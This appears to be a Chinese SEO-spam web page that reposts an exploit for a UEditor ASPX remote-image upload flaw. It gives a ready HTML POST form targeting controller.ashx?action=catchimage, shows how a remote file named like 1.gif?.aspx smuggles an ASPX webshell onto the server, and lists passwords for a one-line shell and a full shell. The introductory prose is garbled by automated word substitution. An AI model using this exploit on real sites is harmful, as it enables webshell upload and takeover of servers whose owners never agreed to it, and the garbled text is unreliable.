免费做网站-ueditor在线编辑器上传漏洞

2021-04-25 20:16 admin
--------

免费做网站

-------

UEditor是由百度搜索WEB前端开发产品研发部开发设计的所见即所得的开源系统富文字编写器,具备轻量、可订制、客户体验出色等特性。开源系统根据BSD协议书,全部源码在协议书容许范畴内可随意改动和应用。百度搜索UEditor的推出,能够协助很多网站开发设计者在开发设计富文字编写器所遇到的困难,节省开发设计者因开发设计富文字编写器所需要的很多時间,合理减少了公司的开发设计成本费。

ueditor ASPX 版本号因为远程控制抓取编码缺点致使的安全性系统漏洞, 官方仍未修补

controller.ashx 文档默认设置在网站根文件目录

键入框里填写远程控制照片详细地址 + ?.aspx, 如 1.gif?.aspx

form action= controller.ashx?action=catchimage enctype= application/x-www-form-urlencoded method= POST
p shell addr: input type= text name= source[] / /p
input type= submit value= Submit /
/form

一句话 登陆密码 xz

1.gif?.aspx

大马 登陆密码 r00ts

2.gif?.aspx

---------

免费做网站

------------